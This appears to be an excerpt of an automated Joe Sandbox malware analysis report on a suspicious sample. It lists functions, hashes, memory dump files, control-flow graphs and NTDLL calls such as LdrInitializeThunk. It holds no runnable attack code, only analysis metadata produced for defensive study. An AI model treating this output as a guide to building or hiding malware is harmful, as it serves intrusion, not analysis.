                                  • Instruction Fuzzy Hash: 0AE0E574E04208EFCB84EFA8D4406ACBBF4EB88314F10C0A99809A3391D635AA42CF80
                                  Function 06AD7580 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f4b7a4f08701211c8500cfa1605b69caa3d286a04419324ec09e14d98f9ad7a
                                  • Instruction ID: 4f00658d92ceade94ca76b8a0c8ba9e9f1b29393afa88fccf29a3a2847f8dc06
                                  • Opcode Fuzzy Hash: 5f4b7a4f08701211c8500cfa1605b69caa3d286a04419324ec09e14d98f9ad7a
                                  • Instruction Fuzzy Hash: 42E0C2B4845208DFC740EFB5D4059AE7BFCDB8E312F0049A5D006A7122EB359E00D792
                                  Function 06AD6650 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a28224ade0da2d087242ca0f7b389362a8f4360db8827e1ffc9ef88845441b7
                                  • Instruction ID: 17ccbac9ce9bf961ed781e782886976935b5dd6d0a963ebeb5b9106835dea896
                                  • Opcode Fuzzy Hash: 1a28224ade0da2d087242ca0f7b389362a8f4360db8827e1ffc9ef88845441b7
                                  • Instruction Fuzzy Hash: 5DE0EC78D16208EFC784FFB8E54969CBBB4EB48202F5054E9D80993250E7315A50DB51
                                  Function 06ADFFA0 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c8ef820efae2750d729e3f729ba814badc3496648bac043e73f571940c4a02b9
                                  • Instruction ID: 597ce8783876b150823804b02b992cd560ebb31403785fd3d1027e94f70cf4bf
                                  • Opcode Fuzzy Hash: c8ef820efae2750d729e3f729ba814badc3496648bac043e73f571940c4a02b9
                                  • Instruction Fuzzy Hash: B8D042B4C4521AAEDB80EFB9990979FBBF4BB08600F10896AC416E2241E7B84645CF91
                                  Function 06ADFA28 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40a5eac5f0e66997c4fb3fa24d8d63cc34de60f495b446f931793f6f92d205ba
                                  • Instruction ID: bf2ddad6e55a6b095ccf1d67753ac5054787fcb963ecdd2ad22fa0079bb3f1af
                                  • Opcode Fuzzy Hash: 40a5eac5f0e66997c4fb3fa24d8d63cc34de60f495b446f931793f6f92d205ba
                                  • Instruction Fuzzy Hash: C0D012361102085E8BC1FFD5EC00C5277DCBB246447008462E505CB130E661E528D751
                                  Function 06AD3537 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f6157f904274730159b77947fecb9f15858bb639d0cac733e1037bc0e3e749a4
                                  • Instruction ID: 55b07fae7ba604a43d0f0cc00762c771b5cf2f447fed8166bda212b6435663c7
                                  • Opcode Fuzzy Hash: f6157f904274730159b77947fecb9f15858bb639d0cac733e1037bc0e3e749a4
                                  • Instruction Fuzzy Hash: C1E0B6B48006588FCB50EF14DD84B9977B5FB44212F0041D99109A3215CB342EC5CF14
                                  Function 06AD9B2C Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c8a69e32fe7d097235414525e3b52721e3f4ce358fdf2c9345384a7959c1650
                                  • Instruction ID: 4cec31f192f205c31765448a39b4ae9a7c32d32d764b76c58c796a729645bd30
                                  • Opcode Fuzzy Hash: 4c8a69e32fe7d097235414525e3b52721e3f4ce358fdf2c9345384a7959c1650
                                  • Instruction Fuzzy Hash: BAB012BD199600ADB78532648E41D2B9512FFE5F00F419D117347600548830D428F25F
                                  Function 06ADD958 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d5da685274e96ef1ca517bf212e7ee73dcee7a427a5bc2327bd0fd33aa4dd58
                                  • Instruction ID: a505640dba3df79eadf915df360f11f024276657a0fe09723b095b64e6c5e1e1
                                  • Opcode Fuzzy Hash: 7d5da685274e96ef1ca517bf212e7ee73dcee7a427a5bc2327bd0fd33aa4dd58
                                  • Instruction Fuzzy Hash: 86A0223080020ECFC3803BE2FC0C808BB2EFB802033800022FA0E808008F382C038BE8

                                  Execution Graph

                                  Execution Coverage:0%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:3
                                  Total number of Limit Nodes:0
                                  execution_graph 62338 1192c1d 62339 1192c1f LdrInitializeThunk 62338->62339 62340 1192b60 LdrInitializeThunk

                                  Executed Functions

                                  Function 01192C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 1192c0a-1192c0f 1 1192c1f-1192c26 LdrInitializeThunk 0->1 2 1192c11-1192c18 0->2 2->1
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011AFD4F,000000FF,00000024,01246634,00000004,00000000,?,-00000018,7D810F61,?,?,01168B12,?,?,?,?), ref: 01192C24
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d5a950425c557110ec0b8cf852149964a5a2e5c73d7c999ea114191b8ea394e0
                                  • Instruction ID: 92b2621fb4649eae48d2c8cb79349ea826f5a04cb7797dd0c57f730f2fd315bb
                                  • Opcode Fuzzy Hash: d5a950425c557110ec0b8cf852149964a5a2e5c73d7c999ea114191b8ea394e0
                                  • Instruction Fuzzy Hash: CFB09B71D015C5D5DF15E7A447087177D0077D0701F65C061D2130651F4738D1D1E275
                                  Function 01192B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4 1192b60-1192b6c LdrInitializeThunk
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011C0DBD,?,?,?,?,011B4302), ref: 01192B6A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 18b522574c78944858160742ed11f6a13ebfd53c8aa689503a47b893b8137e9c
                                  • Instruction ID: be820cbcd4ec67576cb1ce7d2a4e819219268a0f18fdddaa57de0e35a96b1865
                                  • Opcode Fuzzy Hash: 18b522574c78944858160742ed11f6a13ebfd53c8aa689503a47b893b8137e9c
                                  • Instruction Fuzzy Hash: 939002A570240003410971984524626440A97E0202B95C021E1015590DC62589916225
                                  Function 01192DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 7 1192df0-1192dfc LdrInitializeThunk
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011CE73E,0000005A,0122D040,00000020,00000000,0122D040,00000080,011B4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0119AE00), ref: 01192DFA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 35f4794306f4b25b0fbc2e705bd2cc24e9dd5e84ead120fc17473b2f1c3cb209
                                  • Instruction ID: 64fe06c16ea1518e758582bdc64c14be95d06ea433698fecd02b300187869dc8
                                  • Opcode Fuzzy Hash: 35f4794306f4b25b0fbc2e705bd2cc24e9dd5e84ead120fc17473b2f1c3cb209
                                  • Instruction Fuzzy Hash: 9F90027570140413D11571984614717040997D0242FD5C412A0425558DD7568A52A221
                                  Function 01192C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5 1192c1d-1192c26 LdrInitializeThunk
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011AFD4F,000000FF,00000024,01246634,00000004,00000000,?,-00000018,7D810F61,?,?,01168B12,?,?,?,?), ref: 01192C24
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9f4342f8e986bd575f7a4a350b1849bb21038236e7d74c268b25e401dc21f705
                                  • Instruction ID: 460f3a4b962c65b5c46492bb7ebebb0f4eef9a009116238d465fa40c4201c455
                                  • Opcode Fuzzy Hash: 9f4342f8e986bd575f7a4a350b1849bb21038236e7d74c268b25e401dc21f705
                                  • Instruction Fuzzy Hash: 77A0026964588409410572B405644661F155ADA5163A9C085D2821563E87214552A231
                                  Function 011935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 11935c0-11935cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d2f98a27b0a66497d764b208580b8d26f4d4b9da2cb7e2c99b46fa002a0b0742
                                  • Instruction ID: 4cb5c0c6e222168dcb538746267cc431a2a2bf16f9e25eaeab40bbf363bb2140
                                  • Opcode Fuzzy Hash: d2f98a27b0a66497d764b208580b8d26f4d4b9da2cb7e2c99b46fa002a0b0742
                                  • Instruction Fuzzy Hash: B2900275B0550402D10471984624716140597D0202FA5C411A0425568DC7958A5166A2
                                  Function 00429077 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 9 429077-429079 10 42907b-429093 9->10 11 429029-42903b 9->11 12 429099-4290d0 10->12 12->12 13 4290d2-4290da 12->13
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2246572462.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_429000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 878380b2ae068bbe752a33f2f868b351620ee4d3b9a77d8a8c095330f283b425
                                  • Instruction ID: d59adc817cddb9b5097f006d85ea4e674a5d938b195a036cc97889bfd9d5e446
                                  • Opcode Fuzzy Hash: 878380b2ae068bbe752a33f2f868b351620ee4d3b9a77d8a8c095330f283b425
                                  • Instruction Fuzzy Hash: 57014CA1E4E7C68AC3139A38E9812D07F94CA43662B480AEFC880CF647D2125855C7D5
                                  Function 00429000 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14 429000-429027 16 42902d-42903b 14->16
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2246572462.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_429000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1e11e5a9050ef5f500111f56edf9b99f699541f121127329d1ac5b1de1d978d
                                  • Instruction ID: e7c1a7dd83e3b107fc12de62ffe614de5b36329f7f70a6685a289a5aff9f9e77
                                  • Opcode Fuzzy Hash: a1e11e5a9050ef5f500111f56edf9b99f699541f121127329d1ac5b1de1d978d
                                  • Instruction Fuzzy Hash: 3AE0CD7264591477D210D559ECC2FFE7368DF85301F90054EF54896180D6593E918B96

                                  Non-executed Functions

                                  Function 01194A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17 1194a80-1194a8b 18 1194a8d-1194a99 RtlDebugPrintTimes 17->18 19 1194a9f-1194aa6 17->19 18->19 24 1194b25-1194b26 18->24 20 1194aa8-1194aae 19->20 21 1194aaf-1194ab6 call 117f5a0 19->21 26 1194ab8-1194b22 call 1181e46 * 2 21->26 27 1194b23 21->27 26->27 27->24
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                                  • API String ID: 3446177414-2083360775
                                  • Opcode ID: d1eb22d13a56205194a0bd372d683fc71ddc4a41c5c5fa67e129352cc4e0bf78
                                  • Instruction ID: dc0d74ea4a1f5c410cd0529faa2dc6ad892ee41f916cbde368c1a568eeafb545
                                  • Opcode Fuzzy Hash: d1eb22d13a56205194a0bd372d683fc71ddc4a41c5c5fa67e129352cc4e0bf78
                                  • Instruction Fuzzy Hash: BD01BC3AE542106BDF3C9F2CB90C7873AA1B78D72CF05105AE90C9B688D7604CC2DB90
                                  Function 01192890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 228 1192890-11928b3 229 11ca4bc-11ca4c0 228->229 230 11928b9-11928cc 228->230 229->230 233 11ca4c6-11ca4ca 229->233 231 11928dd-11928df 230->231 232 11928ce-11928d7 230->232 235 11928e1-11928e5 231->235 232->231 234 11ca57e-11ca585 232->234 233->230 236 11ca4d0-11ca4d4 233->236 234->231 238 1192988-119298e 235->238 239 11928eb-11928fa 235->239 236->230 237 11ca4da-11ca4de 236->237 237->230 240 11ca4e4-11ca4eb 237->240 243 1192908-119290c 238->243 241 11ca58a-11ca58d 239->241 242 1192900-1192905 239->242 244 11ca4ed-11ca4f4 240->244 245 11ca564-11ca56c 240->245 241->243 242->243 243->235 246 119290e-119291b 243->246 247 11ca50b 244->247 248 11ca4f6-11ca4fe 244->248 245->230 251 11ca572-11ca576 245->251 249 1192921 246->249 250 11ca592-11ca599 246->250 253 11ca510-11ca536 call 11a0050 247->253 248->230 252 11ca504-11ca509 248->252 254 1192924-1192926 249->254 257 11ca5a1-11ca5c9 call 11a0050 250->257 251->230 255 11ca57c call 11a0050 251->255 252->253 269 11ca55d-11ca55f 253->269 259 1192928-119292a 254->259 260 1192993-1192995 254->260 255->269 265 119292c-119292e 259->265 266 1192946-1192966 call 11a0050 259->266 260->259 264 1192997-11929b1 call 11a0050 260->264 278 1192969-1192974 264->278 265->266 272 1192930-1192944 call 11a0050 265->272 266->278 275 1192981-1192985 269->275 272->266 278->254 279 1192976-1192979 278->279 279->257 280 119297f 279->280 280->275
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID:
                                  • API String ID: 48624451-0
                                  • Opcode ID: ef4b25f10048f63347b869f626cb534b3bba3d49e3c8ee45357eff06cc1cf3e7
                                  • Instruction ID: 6fde46e497d74e573028decfd6a798d106088adbfb09ae33397c0fedd525d63d
                                  • Opcode Fuzzy Hash: ef4b25f10048f63347b869f626cb534b3bba3d49e3c8ee45357eff06cc1cf3e7
                                  • Instruction Fuzzy Hash: B351D7B5A00126BFDF19DBAC899097EFBB8BF18640754C129E4B5D7641E334DE5087E0
                                  Function 0116A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 281 116a250-116a26f 282 116a275-116a291 281->282 283 116a58d-116a594 281->283 285 116a297-116a2a0 282->285 286 11b79e6-11b79eb 282->286 283->282 284 116a59a-11b79bb 283->284 284->282 289 11b79c1-11b79c6 284->289 285->286 288 116a2a6-116a2ac 285->288 290 116a2b2-116a2b4 288->290 291 116a6ba-116a6bc 288->291 292 116a473-116a479 289->292 290->286 294 116a2ba-116a2bd 290->294 293 116a6c2 291->293 291->294 295 116a2c3-116a2c6 293->295 294->286 294->295 296 116a2da-116a2dd 295->296 297 116a2c8-116a2d1 295->297 300 116a6c7-116a6d0 296->300 301 116a2e3-116a32b 296->301 298 11b79cb-11b79d5 297->298 299 116a2d7 297->299 303 11b79da-11b79e3 call 11df290 298->303 299->296 300->301 302 116a6d6-11b79ff 300->302 304 116a330-116a335 301->304 302->303 303->286 307 116a47c-116a47f 304->307 308 116a33b-116a343 304->308 311 116a34f-116a35d 307->311 312 116a485-116a488 307->312 310 116a345-116a349 308->310 308->311 310->311 315 116a59f-116a5a8 310->315 313 116a48e-116a49e 311->313 316 116a363-116a368 311->316 312->313 314 11b7a16-11b7a19 312->314 313->314 317 116a4a4-116a4ad 313->317 320 116a36c-116a36e 314->320 321 11b7a1f-11b7a24 314->321 318 116a5c0-116a5c3 315->318 319 116a5aa-116a5ac 315->319 316->320 317->320 323 11b7a01 318->323 324 116a5c9-116a5cc 318->324 319->311 322 116a5b2-116a5bb 319->322 325 116a374-116a38c call 116a6e0 320->325 326 11b7a26 320->326 327 11b7a2b 321->327 322->320 330 11b7a0c 323->330 329 116a5d2-116a5d5 324->329 324->330 334 116a4b2-116a4b9 325->334 335 116a392-116a3ba 325->335 326->327 328 11b7a2d-11b7a2f 327->328 328->292 332 11b7a35 328->332 329->319 330->314 336 116a4bf-116a4c2 334->336 337 116a3bc-116a3be 334->337 335->337 336->337 339 116a4c8-116a4d3 336->339 337->328 338 116a3c4-116a3cb 337->338 340 116a3d1-116a3d4 338->340 341 11b7ae0 338->341 339->304 342 116a3e0-116a3ea 340->342 343 11b7ae4-11b7afc call 11df290 341->343 342->343 344 116a3f0-116a40c call 116a840 342->344 343->292 349 116a5d7-116a5e0 344->349 350 116a412-116a417 344->350 352 116a5e2-116a5eb 349->352 353 116a601-116a603 349->353 350->292 351 116a419-116a43d 350->351 356 116a440-116a443 351->356 352->353 357 116a5ed-116a5f1 352->357 354 116a605-116a623 call 1154508 353->354 355 116a629-116a631 353->355 354->292 354->355 359 116a4d8-116a4dc 356->359 360 116a449-116a44c 356->360 361 116a5f7-116a5fb 357->361 362 116a681-116a6ab RtlDebugPrintTimes 357->362 364 11b7a3a-11b7a42 359->364 365 116a4e2-116a4e5 359->365 366 116a452-116a454 360->366 367 11b7ad6 360->367 361->353 361->362 362->353 380 116a6b1-116a6b5 362->380 368 116a634-116a64a 364->368 369 11b7a48-11b7a4c 364->369 365->368 370 116a4eb-116a4ee 365->370 371 116a520-116a539 call 116a6e0 366->371 372 116a45a-116a461 366->372 367->341 374 116a4f4-116a50c 368->374 375 116a650-116a659 368->375 369->368 376 11b7a52-11b7a5b 369->376 370->360 370->374 390 116a65e-116a665 371->390 391 116a53f-116a567 371->391 377 116a467-116a46c 372->377 378 116a57b-116a582 372->378 374->360 384 116a512-116a51b 374->384 375->366 382 11b7a5d-11b7a60 376->382 383 11b7a85-11b7a87 376->383 377->292 385 116a46e 377->385 378->342 381 116a588 378->381 380->353 381->341 387 11b7a6e-11b7a71 382->387 388 11b7a62-11b7a6c 382->388 383->368 389 11b7a8d-11b7a96 383->389 384->366 385->292 395 11b7a7e 387->395 396 11b7a73-11b7a7c 387->396 394 11b7a81 388->394 389->366 392 116a66b-116a66e 390->392 393 116a569-116a56b 390->393 391->393 392->393 397 116a674-116a67c 392->397 393->377 398 116a571-116a573 393->398 394->383 395->394 396->389 397->356 399 11b7a9b-11b7aa4 398->399 400 116a579 398->400 399->400 401 11b7aaa-11b7ab0 399->401 400->378 401->400 402 11b7ab6-11b7abe 401->402 402->400 403 11b7ac4-11b7acf 402->403 403->402 404 11b7ad1 403->404 404->400
                                  Strings
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 011B79D0, 011B79F5
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B79D5
                                  • SsHd, xrefs: 0116A3E4
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B79FA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
